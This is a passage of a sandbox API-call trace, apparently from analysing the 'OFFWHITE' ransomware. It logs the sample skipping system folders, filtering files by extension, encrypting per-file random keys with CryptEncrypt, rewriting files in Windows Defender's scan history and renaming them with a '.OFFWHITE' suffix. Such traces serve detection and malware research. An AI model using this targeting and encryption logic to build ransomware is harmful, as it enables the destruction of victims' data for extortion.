Defender\\Scans\\History\\CacheManager\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*" [0147.128] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*", lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76b24d28, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xcfc0a7e0, ftLastAccessTime.dwHighDateTime=0x1d2faf9, ftLastWriteTime.dwLowDateTime=0xcfc0a7e0, ftLastWriteTime.dwHighDateTime=0x1d2faf9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName=".", cAlternateFileName="")) returned 0x544790 [0147.128] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.128] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76b24d28, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xcfc0a7e0, ftLastAccessTime.dwHighDateTime=0x1d2faf9, ftLastWriteTime.dwLowDateTime=0xcfc0a7e0, ftLastWriteTime.dwHighDateTime=0x1d2faf9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName="..", cAlternateFileName="")) returned 1 [0147.128] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.128] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.128] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcfc0a7e0, ftCreationTime.dwHighDateTime=0x1d2faf9, ftLastAccessTime.dwLowDateTime=0xcfc0a7e0, ftLastAccessTime.dwHighDateTime=0x1d2faf9, ftLastWriteTime.dwLowDateTime=0xcfc30940, ftLastWriteTime.dwHighDateTime=0x1d2faf9, nFileSizeHigh=0x0, nFileSizeLow=0x33b60, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName="MpSfc.bin", cAlternateFileName="")) returned 1 [0147.128] lstrcmpiW (lpString1="MpSfc.bin", lpString2=".") returned 1 [0147.128] lstrcmpiW (lpString1="MpSfc.bin", lpString2="..") returned 1 [0147.128] lstrcmpiW (lpString1="MpSfc.bin", lpString2="...") returned 1 [0147.128] lstrcmpiW (lpString1="MpSfc.bin", lpString2="windows") returned -1 [0147.128] lstrcmpiW (lpString1="MpSfc.bin", lpString2="$recycle.bin") returned 1 [0147.128] lstrcmpiW (lpString1="MpSfc.bin", lpString2="rsa") returned -1 [0147.129] lstrcmpiW (lpString1="MpSfc.bin", lpString2="ntuser.dat") returned -1 [0147.129] lstrcmpiW (lpString1="MpSfc.bin", lpString2="programdata") returned -1 [0147.129] lstrcmpiW (lpString1="MpSfc.bin", lpString2="appdata") returned 1 [0147.129] lstrcmpiW (lpString1="MpSfc.bin", lpString2="program files") returned -1 [0147.129] lstrcmpiW (lpString1="MpSfc.bin", lpString2="program files (x86)") returned -1 [0147.129] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\" [0147.129] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\", lpString2="MpSfc.bin" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin" [0147.129] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.129] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.129] PathFindExtensionW (pszPath="MpSfc.bin") returned=".bin" [0147.129] lstrcmpiW (lpString1=".bin", lpString2=".exe") returned -1 [0147.129] lstrcmpiW (lpString1=".bin", lpString2=".log") returned -1 [0147.129] lstrcmpiW (lpString1=".bin", lpString2=".cab") returned -1 [0147.129] lstrcmpiW (lpString1=".bin", lpString2=".cmd") returned -1 [0147.129] lstrcmpiW (lpString1=".bin", lpString2=".com") returned -1 [0147.129] lstrcmpiW (lpString1=".bin", lpString2=".cpl") returned -1 [0147.129] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0147.129] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0147.129] lstrcmpiW (lpString1=".bin", lpString2=".url") returned -1 [0147.129] lstrcmpiW (lpString1=".bin", lpString2=".ttf") returned -1 [0147.129] lstrcmpiW (lpString1=".bin", lpString2=".mp3") returned -1 [0147.129] lstrcmpiW (lpString1=".bin", lpString2=".pif") returned -1 [0147.129] lstrcmpiW (lpString1=".bin", lpString2=".mp4") returned -1 [0147.129] lstrcmpiW (lpString1=".bin", lpString2=".OFFWHITE") returned -1 [0147.129] lstrcmpiW (lpString1=".bin", lpString2=".msi") returned -1 [0147.130] lstrcmpiW (lpString1="MpSfc.bin", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.130] GetProcessHeap () returned 0x500000 [0147.130] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526af8 [0147.130] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0147.130] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=211808) returned 1 [0147.130] GetProcessHeap () returned 0x500000 [0147.130] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a48 [0147.130] GetProcessHeap () returned 0x500000 [0147.130] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a60 [0147.130] GetProcessHeap () returned 0x500000 [0147.131] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565230 [0147.131] GetProcessHeap () returned 0x500000 [0147.131] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565338 [0147.131] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.131] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.131] SystemFunction036 (in: RandomBuffer=0x543a48, RandomBufferLength=0x10 | out: RandomBuffer=0x543a48) returned 1 [0147.131] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.131] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.131] SystemFunction036 (in: RandomBuffer=0x543a60, RandomBufferLength=0x10 | out: RandomBuffer=0x543a60) returned 1 [0147.131] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.131] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.131] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565230*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x565230*, pdwDataLen=0x295c910*=0x100) returned 1 [0147.131] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.131] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.131] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565338*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x565338*, pdwDataLen=0x295c90c*=0x100) returned 1 [0147.132] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x33b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.132] SetLastError (dwErrCode=0x0) [0147.132] WriteFile (in: hFile=0x1e4, lpBuffer=0x565230*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x565230*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0147.136] GetLastError () returned 0x0 [0147.136] GetLastError () returned 0x0 [0147.136] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x33c60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.136] WriteFile (in: hFile=0x1e4, lpBuffer=0x565338*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x565338*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0147.136] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x33d60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.136] WriteFile (in: hFile=0x1e4, lpBuffer=0x526af8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x526af8*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0147.136] GetProcessHeap () returned 0x500000 [0147.136] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x33b60) returned 0x5677d0 [0147.136] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.136] ReadFile (in: hFile=0x1e4, lpBuffer=0x5677d0, nNumberOfBytesToRead=0x33b60, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x5677d0*, lpNumberOfBytesRead=0x295cb40*=0x33b60, lpOverlapped=0x0) returned 1 [0147.150] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.150] WriteFile (in: hFile=0x1e4, lpBuffer=0x5677d0*, nNumberOfBytesToWrite=0x33b60, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x5677d0*, lpNumberOfBytesWritten=0x295cb4c*=0x33b60, lpOverlapped=0x0) returned 1 [0147.151] GetProcessHeap () returned 0x500000 [0147.151] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5677d0 | out: hHeap=0x500000) returned 1 [0147.151] CloseHandle (hObject=0x1e4) returned 1 [0147.151] GetProcessHeap () returned 0x500000 [0147.151] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565230 | out: hHeap=0x500000) returned 1 [0147.151] GetProcessHeap () returned 0x500000 [0147.151] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565338 | out: hHeap=0x500000) returned 1 [0147.151] GetProcessHeap () returned 0x500000 [0147.151] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543a48 | out: hHeap=0x500000) returned 1 [0147.151] GetProcessHeap () returned 0x500000 [0147.151] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543a60 | out: hHeap=0x500000) returned 1 [0147.152] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin" [0147.152] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.OFFWHITE" [0147.152] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin"), lpNewFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin.offwhite")) returned 1 [0147.152] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcfc0a7e0, ftCreationTime.dwHighDateTime=0x1d2faf9, ftLastAccessTime.dwLowDateTime=0xcfc0a7e0, ftLastAccessTime.dwHighDateTime=0x1d2faf9, ftLastWriteTime.dwLowDateTime=0xcfc30940, ftLastWriteTime.dwHighDateTime=0x1d2faf9, nFileSizeHigh=0x0, nFileSizeLow=0x33b60, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName="MpSfc.bin", cAlternateFileName="")) returned 0 [0147.153] FindClose (in: hFindFile=0x544790 | out: hFindFile=0x544790) returned 1 [0147.153] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0xa13d69d0, ftLastAccessTime.dwHighDateTime=0x1d2dda3, ftLastWriteTime.dwLowDateTime=0xa13d69d0, ftLastWriteTime.dwHighDateTime=0x1d2dda3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x70006e, dwReserved1=0x295dcf0, cFileName="Results", cAlternateFileName="")) returned 1 [0147.153] lstrcmpiW (lpString1="Results", lpString2=".") returned 1 [0147.153] lstrcmpiW (lpString1="Results", lpString2="..") returned 1 [0147.153] lstrcmpiW (lpString1="Results", lpString2="...") returned 1 [0147.153] lstrcmpiW (lpString1="Results", lpString2="windows") returned -1 [0147.153] lstrcmpiW (lpString1="Results", lpString2="$recycle.bin") returned 1 [0147.153] lstrcmpiW (lpString1="Results", lpString2="rsa") returned -1 [0147.153] lstrcmpiW (lpString1="Results", lpString2="ntuser.dat") returned 1 [0147.153] lstrcmpiW (lpString1="Results", lpString2="programdata") returned 1 [0147.153] lstrcmpiW (lpString1="Results", lpString2="appdata") returned 1 [0147.153] lstrcmpiW (lpString1="Results", lpString2="program files") returned 1 [0147.153] lstrcmpiW (lpString1="Results", lpString2="program files (x86)") returned 1 [0147.153] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\" [0147.153] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\", lpString2="Results" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results" [0147.153] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\" [0147.153] lstrcpyW (in: lpString1=0x295cff0, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\" [0147.153] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*" [0147.153] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*", lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0xa13d69d0, ftLastAccessTime.dwHighDateTime=0x1d2dda3, ftLastWriteTime.dwLowDateTime=0xa13d69d0, ftLastWriteTime.dwHighDateTime=0x1d2dda3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName=".", cAlternateFileName="")) returned 0x544790 [0147.154] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.154] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0xa13d69d0, ftLastAccessTime.dwHighDateTime=0x1d2dda3, ftLastWriteTime.dwLowDateTime=0xa13d69d0, ftLastWriteTime.dwHighDateTime=0x1d2dda3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName="..", cAlternateFileName="")) returned 1 [0147.154] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.154] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.154] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x80be8ad0, ftLastAccessTime.dwHighDateTime=0x1d33740, ftLastWriteTime.dwLowDateTime=0x80be8ad0, ftLastWriteTime.dwHighDateTime=0x1d33740, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName="Resource", cAlternateFileName="")) returned 1 [0147.154] lstrcmpiW (lpString1="Resource", lpString2=".") returned 1 [0147.154] lstrcmpiW (lpString1="Resource", lpString2="..") returned 1 [0147.154] lstrcmpiW (lpString1="Resource", lpString2="...") returned 1 [0147.154] lstrcmpiW (lpString1="Resource", lpString2="windows") returned -1 [0147.154] lstrcmpiW (lpString1="Resource", lpString2="$recycle.bin") returned 1 [0147.154] lstrcmpiW (lpString1="Resource", lpString2="rsa") returned -1 [0147.154] lstrcmpiW (lpString1="Resource", lpString2="ntuser.dat") returned 1 [0147.154] lstrcmpiW (lpString1="Resource", lpString2="programdata") returned 1 [0147.154] lstrcmpiW (lpString1="Resource", lpString2="appdata") returned 1 [0147.154] lstrcmpiW (lpString1="Resource", lpString2="program files") returned 1 [0147.154] lstrcmpiW (lpString1="Resource", lpString2="program files (x86)") returned 1 [0147.154] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\" [0147.154] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\", lpString2="Resource" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource" [0147.154] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\" [0147.154] lstrcpyW (in: lpString1=0x295c970, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\" [0147.154] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*.*" [0147.155] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*.*", lpFindFileData=0x295c518 | out: lpFindFileData=0x295c518*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x80be8ad0, ftLastAccessTime.dwHighDateTime=0x1d33740, ftLastWriteTime.dwLowDateTime=0x80be8ad0, ftLastWriteTime.dwHighDateTime=0x1d33740, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x90008e, dwReserved1=0x295cff0, cFileName=".", cAlternateFileName="")) returned 0x5447d0 [0147.155] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.155] FindNextFileW (in: hFindFile=0x5447d0, lpFindFileData=0x295c518 | out: lpFindFileData=0x295c518*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x80be8ad0, ftLastAccessTime.dwHighDateTime=0x1d33740, ftLastWriteTime.dwLowDateTime=0x80be8ad0, ftLastWriteTime.dwHighDateTime=0x1d33740, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x90008e, dwReserved1=0x295cff0, cFileName="..", cAlternateFileName="")) returned 1 [0147.155] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.155] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.155] FindNextFileW (in: hFindFile=0x5447d0, lpFindFileData=0x295c518 | out: lpFindFileData=0x295c518*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80be8ad0, ftCreationTime.dwHighDateTime=0x1d33740, ftLastAccessTime.dwLowDateTime=0x80be8ad0, ftLastAccessTime.dwHighDateTime=0x1d33740, ftLastWriteTime.dwLowDateTime=0x81085570, ftLastWriteTime.dwHighDateTime=0x1d33740, nFileSizeHigh=0x0, nFileSizeLow=0x1a60, dwReserved0=0x90008e, dwReserved1=0x295cff0, cFileName="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", cAlternateFileName="{1D1DB~1")) returned 1 [0147.155] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2=".") returned 1 [0147.155] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="..") returned 1 [0147.155] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="...") returned 1 [0147.155] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="windows") returned -1 [0147.155] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="$recycle.bin") returned 1 [0147.155] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="rsa") returned -1 [0147.155] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="ntuser.dat") returned -1 [0147.155] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="programdata") returned -1 [0147.155] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="appdata") returned -1 [0147.155] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="program files") returned -1 [0147.155] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="program files (x86)") returned -1 [0147.155] lstrcpyW (in: lpString1=0x295c768, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\" [0147.156] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\", lpString2="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" [0147.156] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.156] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.156] PathFindExtensionW (pszPath="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}") returned="" [0147.156] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0147.156] lstrcmpiW (lpString1="", lpString2=".log") returned -1 [0147.156] lstrcmpiW (lpString1="", lpString2=".cab") returned -1 [0147.156] lstrcmpiW (lpString1="", lpString2=".cmd") returned -1 [0147.156] lstrcmpiW (lpString1="", lpString2=".com") returned -1 [0147.156] lstrcmpiW (lpString1="", lpString2=".cpl") returned -1 [0147.156] lstrcmpiW (lpString1="", lpString2=".ini") returned -1 [0147.156] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0147.156] lstrcmpiW (lpString1="", lpString2=".url") returned -1 [0147.156] lstrcmpiW (lpString1="", lpString2=".ttf") returned -1 [0147.156] lstrcmpiW (lpString1="", lpString2=".mp3") returned -1 [0147.156] lstrcmpiW (lpString1="", lpString2=".pif") returned -1 [0147.156] lstrcmpiW (lpString1="", lpString2=".mp4") returned -1 [0147.156] lstrcmpiW (lpString1="", lpString2=".OFFWHITE") returned -1 [0147.156] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0147.156] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.156] GetProcessHeap () returned 0x500000 [0147.156] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526b08 [0147.157] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0147.160] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x295c4e0 | out: lpFileSize=0x295c4e0*=6752) returned 1 [0147.160] GetProcessHeap () returned 0x500000 [0147.160] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a60 [0147.160] GetProcessHeap () returned 0x500000 [0147.160] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a48 [0147.160] GetProcessHeap () returned 0x500000 [0147.160] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565338 [0147.160] GetProcessHeap () returned 0x500000 [0147.160] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565230 [0147.160] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.160] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.160] SystemFunction036 (in: RandomBuffer=0x543a60, RandomBufferLength=0x10 | out: RandomBuffer=0x543a60) returned 1 [0147.160] lstrcmpiW (lpString1="arsdsr.exe", 